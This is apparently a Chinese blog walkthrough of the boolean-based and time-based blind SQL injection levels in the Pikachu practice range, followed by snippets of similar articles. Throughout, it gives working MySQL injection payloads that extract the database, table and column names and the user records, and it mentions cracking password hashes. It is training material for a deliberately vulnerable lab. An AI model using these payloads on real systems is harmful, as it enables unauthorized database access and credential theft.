pikachu盲注

最新推荐文章于 2025-04-05 21:49:56 发布
最新推荐文章于 2025-04-05 21:49:56 发布
阅读量424 收藏 4
点赞数 1
分类专栏: 小白安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/miaositekali/article/details/129149563
版权

盲注(base on boolian)

通过输入kobe,kobe'和kobe'#可以判断存在字符型注入,并且只会返回true和false,不会返回报错信息。

判断库名的第一个字母

kobe' and ascii(substr(database(),1,1))>111#
kobe' and ascii(substr(database(),1,1))>112#

大于111,不大于112,则该字符的ASCII码为112,该字符为p。

可以检验一下。

kobe' and ascii(substr(database(),1,1))=112#

依次进行手动注入,可以得到库名pikachu。

接下来需要得到表名,操作与得到数据库名类似。

kobe' and ascii(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104#

可以拿到第一个表名的第一个字母h,依次进行手工注入,可以得到表名,httpinfo,member,message,users,xssblind。

接着我们需要拿到users的各个列名。

kobe' and ascii(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1,1))=85#

这样就拿到了users表的第一个字段名,依次可得到users表中的所有字段名。

紧接着我们还需要拿到字段username中的值。

kobe' and ascii(substr((select username from users limit 0,1),1,1))=97#

可以得到username字段第一个记录的第一个字母a。

同理也可以拿到password的记录,只不过还需要进行md5解密,

盲注(base on time)

kobe' and sleep(5)#

延时五秒。

利用延时,得到库名

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

可以得到数据库名的第一个字母p,依次注入可以得到数据库名pikachu。

类似的可以得到表名和列名。

kobe' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='h',sleep(5),null)#

pikachu——时间
Lollipop_zhi的博客
03-02 5119
如果是布尔,页面上会有0和1的变化,但是时间页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
pikachu——布尔
Lollipop_zhi的博客
03-02 6869
基于boolean的主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu(base on boolian)
weixin_50339082的博客
06-15 1561
pikachu(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少次数。 ...
pikachu靶场字符型入+布尔
最新发布
tengyuehou的博客
04-05 444
name=vince' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=1 --+&submit=查询。name=vince' and%20 ascii(substr((select%20 username from pikachu.member limit 0,1),1,1))=1--+&submit=查询。
pikachu(base on time)
weixin_50339082的博客
06-14 1199
pikachu(base on time) 打开pikachu测试平台。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具(F12),控制台,选择网络。 输入 kobe’ and sleep(5)#,发现延迟5秒发送。 输入错误信息,发现sleep语句不执行 这样我们就可以写一个判断 kobe’ and if((substr(database(),1,1))=‘?’,sleep(5),null)# 输入 kobe’ and if((subst
pikachu SQL 入(
weixin_60508121的博客
04-19 4139
SQL 1.判断是否存在入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.表名猜测 kobe' and length((sele..
sql入之pikachu练习
windStudyer的专栏
05-21 905
sqlpikachu练习
pikachu
08-25
"PIKACHU"是指基于时间或布尔值的技术。是一种入攻击技术,没有页面回显来判断是否存在入。基于时间的是指攻击者通过在入语句中添加延时函数来检测入的结果是否延时。基于布尔值的是指...
pikachu靶场 SQL-inject
Al_1的博客
10-03 1116
数字型入,字符型入,搜索型入,xx型入,增改入,删除入,请求头入,布尔,时间,宽字节
pikachu时间
03-19
### 关于Pikachu时间SQL入实验室 Pikachu是一款用于Web安全学习的靶场工具,它提供了多种类型的漏洞实验环境供用户练习,其中包括SQL入中的时间类型。时间是一种通过延迟数据库响应来判断条件真假...
pikachu(时间
ANYOUZHEN的博客
05-11 1422
pikachu基于时间 我们输入' 返回I don't care 我们输入anyouzhen sakura ,同样返回I don't care 我们可以利用sleep()函数进行判断,是否存在入点 我们输入 kobe' and sleep(5)# 查看网络,发现雀食存在5s的延迟,说明后面闭合后的内容被带入到数据库中去了 所以可以说明存在入点,这种入方式被称为时间 基于时间的延迟: kobe' and if((substr(database(),1,1))='p',sl
pikachu(时间)
2301_79595769的博客
12-23 380
属于的一种,不同于布尔的是:布尔是需要有两个页面,一对一错来判断入是否正确,而时间可以在不返回正确错误页面的情况下进行准确入(错误正确只返回一个页面,布尔无法实施)在执行正确和错误的语句时均返回一个页面,无法通过回显判断入的是否正确。若立马响应,那就说明并不存在入点或者猜测的数字/字母错误。通过是否执行sleep函数来判断猜测的语句是否正确。若语句正确,执行sleep(5)使页面停顿5秒。随后输入kobe' and sleep(5)#一般是在布尔都行不通的情况下才使用时间
[Pikachu靶场实战系列] SQL入(
00勇士王子的博客
07-29 4372
目录布尔时间 的意思就是说页面没有明显的回显,我们只能通过其他方式判断入点。 常见的方式有两种,一种是布尔,通过页面返回的不同状态判断语句是否被执行。另一种是时间,通过页面加载时间来判断语句是否被执行。 布尔 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上释符号后,返回又正常了,说明入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
Pikachu布尔结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 835
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行入的判断。这种情况下的入,称为根据展现方式,分为布尔型和时间型
Pikachu-Sql-Inject -基于boolian的
guanrongl的专栏
10-03 1150
布尔型入用到得SQL 语句select if(1=1,1,0) if()函数在mysql 是判断,第一个参数表达式,如果条件成立,会显示1,否则显示0。从前面已经知道有个用户 为 vince ,如果长度判断正确,回返回vince 这个用户,错误则显示不存在;if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0。2、不管是正确的输入,还是错误的输入,都只显示两种情况,true or false;第一个 1 ,代表查第一张表,第二个1,1 代表查第一个字母;
pikachu漏洞练习第四章节SQL入-based on time,原理练习收获
kaka6764的博客
09-02 410
如果说基于boolean的在页面上还可以看到0 or 1的回显的话,那么基于time的完全就啥都看不到了!但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认入!
PIKACHU--SQL
鲨鱼辣椒的博客
05-17 1833
SQL Inject(SQL)概述 入漏洞在全球漏洞排行榜上一直高居榜首而入漏洞中首当其冲的就是数据库入漏洞,SQL入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL入流程 入点探测 手动方式:手工构造SQL语句进行入点发现 自动方式:采用自动扫描工具,自动进行入点发现 信息获取 通过
Pikachu-Sql-Inject - 基于时间的
guanrongl的专栏
10-04 671
mysql 里函数sleep() 是延时的意思,sleep(10)就是数据库延时10 秒返回内容。mysql 延时入用到的函数sleep() 、if()、substring()、select if(2>1,sleep(10),0) 2>1 这个部分就是你入要构造的SQL 语句。就是前端的基于time 的,什么错误信息都看不到,但是还可以通过特定的输入,判断后台的执行时间,从而确定入。构造payload;如果数据库长度大于1 ,延时五秒返回;根据这个条件,可以逐个爆破表;
pikachu~~~布尔,时间,宽字节
weixin_50339832的博客
06-03 1394
基于boolian的 屏蔽了报错信息,只显示两种情况:正确和错误 输入单引号试探f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值